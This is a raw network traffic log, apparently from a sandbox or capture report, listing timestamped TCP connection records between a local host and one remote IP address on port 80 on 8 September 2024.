                                                          Sep 8, 2024 11:53:45.464380980 CEST806481180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:45.466474056 CEST6481180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:45.467197895 CEST806481280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:45.467359066 CEST6481280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:45.467611074 CEST6481280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:45.472644091 CEST806481280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:45.822377920 CEST6481280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:45.827337980 CEST806481280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:45.827347040 CEST806481280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:45.827359915 CEST806481280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.141524076 CEST806481280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.197688103 CEST6481280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.346350908 CEST806481280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.400110006 CEST6481280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.474107981 CEST6481280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.479439020 CEST806481280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.479489088 CEST6481280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.490165949 CEST6481380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.494980097 CEST806481380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.495070934 CEST6481380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.495265961 CEST6481380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.500078917 CEST806481380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.590528011 CEST6481380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.591077089 CEST6481480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.596014977 CEST806481480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.596076012 CEST6481480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.596179008 CEST6481480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.600955963 CEST806481480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.637954950 CEST806481380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.714808941 CEST6481580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.719914913 CEST806481580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.719973087 CEST6481580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.720159054 CEST6481580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.727193117 CEST806481580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.947154045 CEST6481480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:46.952303886 CEST806481480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.952325106 CEST806481480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.959873915 CEST806481380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:46.962428093 CEST6481380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.072067022 CEST6481580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.077084064 CEST806481580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.077096939 CEST806481580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.077105999 CEST806481580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.275499105 CEST806481480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.391052008 CEST806481580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.411120892 CEST806481480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.414407969 CEST6481480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.447297096 CEST6481580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.520620108 CEST806481580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.574367046 CEST6481580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.646378040 CEST6481480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.646635056 CEST6481580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.649909019 CEST6481680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.651525021 CEST806481480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.651736975 CEST6481480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.651796103 CEST806481580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.652252913 CEST6481580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.654695034 CEST806481680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:47.654845953 CEST6481680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.655071020 CEST6481680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:47.659949064 CEST806481680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.010149956 CEST6481680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:48.015208960 CEST806481680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.015217066 CEST806481680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.015225887 CEST806481680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.348093987 CEST806481680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.400115967 CEST6481680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:48.482502937 CEST806481680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.525155067 CEST6481680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:48.607546091 CEST6481780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:48.612581968 CEST806481780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.612637043 CEST6481780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:48.612793922 CEST6481780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:48.617568016 CEST806481780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.962723970 CEST6481780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:48.967927933 CEST806481780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.967945099 CEST806481780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:48.967955112 CEST806481780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:49.279827118 CEST806481780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:49.479976892 CEST806481780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:49.480043888 CEST6481780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:49.599694014 CEST6481780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:49.599694014 CEST6481880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:49.604603052 CEST806481880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:49.604723930 CEST6481880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:49.604927063 CEST806481780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:49.604969978 CEST6481880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:49.605063915 CEST6481780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:49.609843969 CEST806481880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:49.962701082 CEST6481880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:49.967758894 CEST806481880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:49.967767954 CEST806481880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:49.967782021 CEST806481880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:50.298108101 CEST806481880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:50.432838917 CEST806481880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:50.432904959 CEST6481880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:50.558157921 CEST6481880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:50.558994055 CEST6481980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:50.563307047 CEST806481880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:50.563359022 CEST6481880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:50.563751936 CEST806481980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:50.563812017 CEST6481980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:50.563951969 CEST6481980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:50.568712950 CEST806481980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:50.915904999 CEST6481980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:50.920867920 CEST806481980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:50.920883894 CEST806481980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:50.920895100 CEST806481980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:51.249217987 CEST806481980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:51.290735960 CEST6481980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.384736061 CEST806481980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:51.434372902 CEST6481980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.506376982 CEST6481680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.507639885 CEST6481980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.507644892 CEST6482080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.512542963 CEST806482080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:51.512660027 CEST806481980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:51.514594078 CEST6481980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.514597893 CEST6482080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.514620066 CEST6482080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.519783974 CEST806482080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:51.870373964 CEST6482080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:51.875392914 CEST806482080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:51.875401974 CEST806482080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:51.875408888 CEST806482080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.211961985 CEST806482080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.350106001 CEST806482080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.354396105 CEST6482080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.417834044 CEST6482080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.418916941 CEST6482180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.423563957 CEST806482080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.423604012 CEST6482080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.423911095 CEST806482180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.423968077 CEST6482180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.424175978 CEST6482180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.434591055 CEST806482180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.538850069 CEST6482180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.559688091 CEST6482280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.564486027 CEST806482280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.564541101 CEST6482280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.564677000 CEST6482280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.569470882 CEST806482280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.586245060 CEST806482180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.906840086 CEST806482180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.906892061 CEST6482180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.915919065 CEST6482280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:52.920805931 CEST806482280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.920818090 CEST806482280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:52.920829058 CEST806482280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:53.241549015 CEST806482280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:53.290730953 CEST6482280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:53.364639997 CEST806482280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:53.415726900 CEST6482280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:53.489785910 CEST6482280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:53.490638971 CEST6482380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:53.495975018 CEST806482280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:53.496057987 CEST6482280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:53.496095896 CEST806482380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:53.496295929 CEST6482380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:53.496387005 CEST6482380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:53.501624107 CEST806482380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:53.857218981 CEST6482380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:53.862402916 CEST806482380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:53.862410069 CEST806482380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:53.862413883 CEST806482380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:54.171480894 CEST806482380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:54.306372881 CEST6482380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:54.372788906 CEST806482380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:54.373024940 CEST6482380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:54.379074097 CEST806482380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:54.379148960 CEST6482380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:54.492257118 CEST6482480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:54.497210979 CEST806482480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:54.497277021 CEST6482480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:54.497406006 CEST6482480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:54.502527952 CEST806482480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:54.853415966 CEST6482480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:54.858428955 CEST806482480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:54.858443022 CEST806482480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:54.858452082 CEST806482480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:55.161540985 CEST806482480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:55.216150999 CEST6482480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:55.357681036 CEST806482480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:55.400122881 CEST6482480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:55.476375103 CEST6482480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:55.476377010 CEST6482580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:55.481403112 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:55.481534004 CEST6482580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:55.481784105 CEST6482580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:55.481801987 CEST806482480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:55.482445002 CEST6482480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:55.486790895 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:55.838398933 CEST6482580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:55.843512058 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:55.843519926 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:55.843530893 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.156924963 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.212639093 CEST6482580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:56.476120949 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.509809971 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.509856939 CEST6482580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:56.635540009 CEST6482580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:56.636465073 CEST6482680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:56.641062021 CEST806482580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.641115904 CEST6482580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:56.641422987 CEST806482680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.641530991 CEST6482680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:56.641725063 CEST6482680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:56.646684885 CEST806482680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.993968964 CEST6482680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:56.998966932 CEST806482680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.998981953 CEST806482680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:56.998994112 CEST806482680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.306859016 CEST806482680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.354376078 CEST6482680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.436763048 CEST806482680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.494379997 CEST6482680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.554387093 CEST6482780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.554388046 CEST6482680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.559310913 CEST806482780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.559546947 CEST806482680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.560556889 CEST6482680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.560558081 CEST6482780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.560575008 CEST6482780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.565390110 CEST806482780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.573020935 CEST6482780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.578375101 CEST6482880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.583214998 CEST806482880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.583545923 CEST6482880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.583802938 CEST6482880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.588814020 CEST806482880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.625813961 CEST806482780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.694643021 CEST6482980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.700007915 CEST806482980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.700655937 CEST6482980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.700756073 CEST6482980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.705480099 CEST806482980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.933047056 CEST6482880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:57.938098907 CEST806482880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:57.938107967 CEST806482880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.027276993 CEST806482780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.033390045 CEST6482780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.057395935 CEST6482980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.062378883 CEST806482980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.062422037 CEST806482980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.062427044 CEST806482980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.277067900 CEST806482880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.322020054 CEST6482880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.367378950 CEST806482980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.410808086 CEST806482880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.415971994 CEST6482980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.454468966 CEST6482880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.571671009 CEST806482980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.618865967 CEST6482980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.702820063 CEST6482880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.702953100 CEST6482980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.703847885 CEST6483080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.707990885 CEST806482880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.708039999 CEST6482880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.708286047 CEST806482980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.708332062 CEST6482980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.708693027 CEST806483080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:58.708767891 CEST6483080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.708890915 CEST6483080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:58.713679075 CEST806483080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:59.056489944 CEST6483080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:59.065603971 CEST806483080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:59.065618038 CEST806483080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:59.065629005 CEST806483080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:59.382931948 CEST806483080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:59.431391954 CEST6483080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:59.596944094 CEST806483080.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:59.650135994 CEST6483080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:59.726644039 CEST6483180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:59.731843948 CEST806483180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:53:59.734489918 CEST6483180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:59.734606981 CEST6483180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:53:59.739933968 CEST806483180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:00.087728024 CEST6483180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:00.092674017 CEST806483180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:00.092683077 CEST806483180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:00.092694998 CEST806483180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:00.413959026 CEST806483180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:00.462609053 CEST6483180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:00.607584000 CEST806483180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:00.650109053 CEST6483180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:00.740658045 CEST6483180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:00.741590977 CEST6483280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:00.746144056 CEST806483180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:00.746190071 CEST6483180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:00.746392012 CEST806483280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:00.746448994 CEST6483280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:00.746680975 CEST6483280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:00.751709938 CEST806483280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:01.103444099 CEST6483280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:01.114048958 CEST806483280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:01.114068985 CEST806483280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:01.114079952 CEST806483280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:01.420110941 CEST806483280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:01.466386080 CEST6483280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:01.552289963 CEST806483280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:01.606390953 CEST6483280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:01.678380966 CEST6483280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:01.678533077 CEST6483380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:01.683466911 CEST806483380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:01.683679104 CEST6483380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:01.683679104 CEST6483380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:01.683698893 CEST806483280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:01.683819056 CEST6483280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:01.688656092 CEST806483380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.042386055 CEST6483380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.048923016 CEST806483380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.048953056 CEST806483380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.048957109 CEST806483380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.348670959 CEST806483380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.400119066 CEST6483380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.476887941 CEST806483380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.525139093 CEST6483380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.600637913 CEST6483080192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.606584072 CEST6483380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.607566118 CEST6483480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.615380049 CEST806483380.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.615433931 CEST6483380192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.615909100 CEST806483480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.615959883 CEST6483480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.616149902 CEST6483480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.625015974 CEST806483480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.962753057 CEST6483480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:02.967911005 CEST806483480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.967941046 CEST806483480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:02.967951059 CEST806483480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:03.296987057 CEST806483480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:03.354392052 CEST6483480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:03.416716099 CEST6483480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:03.417299032 CEST6483580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:03.422389984 CEST806483480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:03.422401905 CEST806483580.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:54:03.422704935 CEST6483580192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:03.422705889 CEST6483480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:54:03.422836065 CEST6483580192.168.2.480.211.144.156
